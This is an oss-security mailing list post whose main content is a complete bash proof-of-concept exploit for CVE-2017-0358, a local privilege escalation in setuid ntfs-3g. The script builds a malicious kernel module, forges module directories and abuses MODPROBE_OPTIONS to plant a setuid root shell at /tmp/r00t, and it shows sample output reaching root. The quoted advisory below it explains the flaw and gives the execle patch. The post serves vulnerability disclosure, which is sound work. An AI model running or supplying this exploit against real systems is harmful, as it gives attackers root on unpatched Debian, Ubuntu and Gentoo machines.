Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence
 vulnerability via environment variables

#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "

cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen
<kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");

int init_module(void) {
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want
to patch your system!\n");
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t;
/bin/chmod u+s /tmp/r00t", NULL };
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
  return 0;
}

void cleanup_module(void) {
  printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF

cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED:
linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null
1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have
root. Don't be evil :)"
/tmp/r00t

echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF


On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE does not not scrub the environment before
> executing modprobe to load the fuse module. This influence the behavior
> of modprobe (MODPROBE_OPTIONS environment variable, --config and
> --dirname options) potentially allowing for local root privilege
> escalation if ntfs-3g is installed setuid. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem is in the source since 2008, maybe before.
> The fix is easy, use execle instead of execl and pass NULL as
> environment variables.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref        2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c    2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
> --- ntfs-3g/src/ntfs-3g.c.ref   2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c       2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS



-- 
Regards,

Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen

View attachment "cve-2017-0358.sh.txt" of type "text/plain" (15934 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.